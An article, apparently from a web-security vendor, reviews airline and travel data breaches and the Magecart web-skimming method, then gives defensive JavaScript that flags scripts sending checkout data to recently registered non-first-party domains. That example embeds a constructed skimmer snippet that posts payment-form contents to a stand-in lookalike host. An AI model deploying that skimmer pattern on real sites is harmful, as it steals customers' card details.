Airline Data Breaches
Travel websites, and airlines in particular, are key targets for cyberattacks: the data they hold (identity details, travel itineraries and payment cards) is valuable, so the reward for a successful compromise is high. Over the years there have been a number of airline data breaches, with some companies suffering multiple attacks. By analysing the major airline and travel breaches and understanding the tactics the attackers used, security controls can be put in place to prevent or quickly detect the same attacks.
EasyJet
- 9 million customers affected
- 5-month breach
- 2,208 customers had financial information stolen
- £18 billion class-action lawsuit
On 19th May 2020, EasyJet published a Notice of Cybersecurity Incident revealing that in January 2020 it had become aware of what it described as a highly sophisticated cyber attack affecting 9 million customers. Customers who booked flights between 17th October 2019 and 4th March 2020 had their email addresses and travel details accessed, and 2,208 of them also had credit card details accessed. EasyJet warned the nine million customers whose email addresses were exposed to be wary of phishing attacks.
UK cybercrime reporting agency Action Fraud said that by May 2020 it had received 51 reports of credit card fraud resulting from the EasyJet data breach, with the estimated loss to card holders standing at £11,752.81.
EasyJet’s regulatory penalty is yet to be determined; under GDPR the ICO can impose fines of up to 4% of annual turnover, which for EasyJet would be calculated on its 2019 figures. Additionally, law firm PGMBM is planning to file an £18 billion class-action lawsuit against EasyJet.
The firm’s security problems did not end with the breach: in September 2020 a Which? investigation reported hundreds of security vulnerabilities on the websites of major airlines, including 222 vulnerabilities across easyJet’s nine domains when they were scanned in June 2020.
Which? explains:
“The vulnerabilities included two critical flaws, with one so serious that, if exploited, an attacker could hijack someone’s browsing session. This could open up opportunities to steal private data. In response to our research, easyJet took three domains offline and resolved the disclosed vulnerabilities on the other six sites.”
Malaysia Airlines
- 9-year period
- Undisclosed number of affected customers
- Fine TBD
On 1st March 2021, in an email to members, Malaysia Airlines revealed a data breach spanning nine years, involving data registered between March 2010 and June 2019. The incident occurred at a third-party IT service provider, not on Malaysia Airlines’ own infrastructure, and exposed member data from its Enrich frequent flyer programme. The data included customer names, dates of birth, contact information, and frequent flyer details such as membership number, status and tier level. Malaysia Airlines stated that it had no evidence of the data being used maliciously. Note that the compromise of a supplier rather than the airline itself is a recurring pattern: the airline remains the data controller and answerable to its members regardless of where the data was actually held.
Expedia-owned Orbitz
- 3-month breach
- 2 years’ worth of records accessed
- 880,000 affected payment cards
- $110,000 fine
On 1st March 2018, Expedia-owned Orbitz disclosed a security breach in which a travel rewards redemption service it hosted had been compromised. The attackers were able to access personal information stored on its consumer and business partner platforms. The intrusion took place between October and December 2017, but the records accessed dated back to 1st January 2016. Information accessed included names, addresses, dates of birth, email addresses and credit card information. Orbitz, acquired by Expedia in 2015 for $1.6 billion, put additional security controls in place on the compromised platform and said its current website was not involved. Orbitz notified affected consumers and offered them a year of credit monitoring and identity protection services. In 2019 the company reached a $110,000 settlement with the Pennsylvania attorney general’s office.
British Airways
- 420,000 customers affected
- 15-day breach
- £20m fine
- 16,000 consumers claimed compensation
In 2018, British Airways suffered a devastating web-skimming attack affecting 420,000 customers over a 15-day period. The breach was first disclosed on 6th September 2018. Customers who booked flights through the website or the BA app were not sent to a fake site: the genuine checkout page had been tampered with, and the details they typed into it were copied and siphoned off. The group responsible, ‘Magecart’, used a vulnerability to insert 22 lines of JavaScript into the payment page that captured the form contents on submission. Data captured included names, usernames, passwords, addresses and credit card details. To stay unnoticed, the skimmer exfiltrated the card details to a lookalike domain, ‘baways.com’, chosen so that the outbound traffic would look like legitimate British Airways activity; this use of spoofed or lookalike domains is a common feature of web-skimming attacks.
Monitoring where a page sends data is therefore imperative for travel companies. A control that inventories the third-party scripts on a page and the hosts those scripts talk to, such as a client-side detection tool or a Content Security Policy with reporting, would have flagged the new, unexpected destination within minutes rather than weeks, meaning the malicious code could have been removed and the vulnerability patched far sooner, protecting hundreds of thousands of customers’ personal and financial information.
The General Data Protection Regulation (GDPR) came into force in May 2018, and British Airways was one of the first companies to receive a publicly announced penalty under the new regime. The Information Commissioner’s Office (ICO) initially announced its intention to fine British Airways £183m, roughly 1.5% of the airline’s global turnover and well below the 4% maximum the regulation allows; the final fine was reduced to £20m. Law firm PGMBM also filed the largest opt-in group action in UK legal history, with 16,000 customers signing up to the claim against the company.
Information Commissioner Elizabeth Denham said:
“People’s personal data is just that – personal. When an organisation fails to protect it from loss, damage or theft, it is more than an inconvenience. That’s why the law is clear – when you are entrusted with personal data, you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”
Sam Jenkins, Principal Security Developer, RapidSpike
“During the pandemic, we saw a 20% rise in web-skimming attacks, and Magecart continues to be the number one security threat to websites today. A good indicator of the legitimacy of a domain is to check the WHOIS record and view when and where the domain was registered, and to whom. Often attackers only register the domain a few days or weeks before an attack takes place. In the case of British Airways, the ‘baways.com’ domain was used; consumers were unaware that this domain was not part of the British Airways group, but the company should have been aware much sooner. Airlines and travel websites need to improve their security systems by taking both a proactive and a reactive approach to avoid data exposure, fines and reputational damage.”
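The two checks described above, monitoring where a checkout page’s scripts send data (British Airways section) and looking at how recently the receiving domain was registered (Sam Jenkins’ WHOIS advice), as an added example that is not part of the original article, RapidSpike’s product or any airline’s code. Every hostname, the skimmer-style snippet and the WHOIS creation dates are constructed for the example; the `.example` domains are hypothetical, and the `ALLOWED_HOSTS` list and the `maxAgeDays` threshold are assumptions a site would set for itself.

```javascript
// Added example, not code from the original article, RapidSpike or British Airways.
// Given the text of a script seen on a checkout page, it answers two questions:
//   1. where does the script send data, and is that host first-party?
//   2. how recently was the receiving domain registered?
// Every hostname, the skimmer snippet and the WHOIS dates below are constructed.

// Hypothetical first-party hosts the checkout page is allowed to talk to.
const ALLOWED_HOSTS = new Set(["www.airline.example", "api.airline.example"]);

// Constructed WHOIS snapshot (creation dates), used as an offline lookup so the
// example never touches the network. A real check would query a WHOIS/RDAP service.
const WHOIS_CREATED = {
  "airline.example": "2005-03-02",
  "secure-airline.example": "2018-08-10", // hypothetical lookalike exfil host
};

// Constructed script imitating the pattern the article describes: hook the
// checkout submit, serialise the payment form, POST it to a lookalike domain.
const SUSPECT_SCRIPT = `
window.addEventListener("load", function () {
  document.getElementById("submitButton").addEventListener("mouseup", function () {
    var form = new FormData(document.getElementById("paymentForm"));
    var body = JSON.stringify(Object.fromEntries(form));
    setTimeout(function () {
      fetch("https://secure-airline.example/collect", { method: "POST", body: body });
    }, 500);
  });
});
`;

// Pull every absolute http(s) URL out of script text.
function extractUrls(scriptText) {
  const matches = scriptText.match(/https?:\/\/[^\s"'`)]+/g) || [];
  return matches.map((u) => new URL(u));
}

// Registrable-domain approximation: last two labels. Good enough for the
// constructed names here; production code should use the public suffix list.
function registrable(host) {
  return host.split(".").slice(-2).join(".");
}

// Whole days from ISO date a to ISO date b (both parsed as UTC midnight).
function daysBetween(a, b) {
  return Math.round((new Date(b) - new Date(a)) / 86400000);
}

// Analyse a script observed on a given date. Returns one finding per destination.
function analyseScript(scriptText, observedOn, opts = {}) {
  const allowed = opts.allowedHosts || ALLOWED_HOSTS;
  const whois = opts.whois || WHOIS_CREATED;
  const maxAgeDays = opts.maxAgeDays === undefined ? 30 : opts.maxAgeDays;
  const allowedRegistrable = new Set([...allowed].map(registrable));

  return extractUrls(scriptText).map((u) => {
    const host = u.hostname;
    const firstParty = allowed.has(host) || allowedRegistrable.has(registrable(host));
    const created = whois[host] || whois[registrable(host)];
    const ageDays = created ? daysBetween(created, observedOn) : null;
    const reasons = [];
    if (!firstParty) reasons.push("destination is not a first-party host");
    if (!firstParty && ageDays === null) reasons.push("no WHOIS creation date on record");
    if (ageDays !== null && ageDays < maxAgeDays) {
      reasons.push(`domain registered only ${ageDays} days before observation`);
    }
    return { host, path: u.pathname, firstParty, ageDays, suspicious: reasons.length > 0, reasons };
  });
}

// Run stand-alone: node skimmer_check.js
if (typeof require !== "undefined" && require.main === module) {
  for (const finding of analyseScript(SUSPECT_SCRIPT, "2018-08-21")) {
    console.log(JSON.stringify(finding));
  }
}
```

Run against the constructed skimmer the check reports one destination, `secure-airline.example`, that is not first-party and whose registration date is only 11 days before the observation date; a script that only calls `api.airline.example` produces no finding. The allow-list used here is the same data a site would put in a Content Security Policy `connect-src` directive, which is the browser-enforced version of this check, and the offline WHOIS table stands in for a live RDAP or WHOIS query.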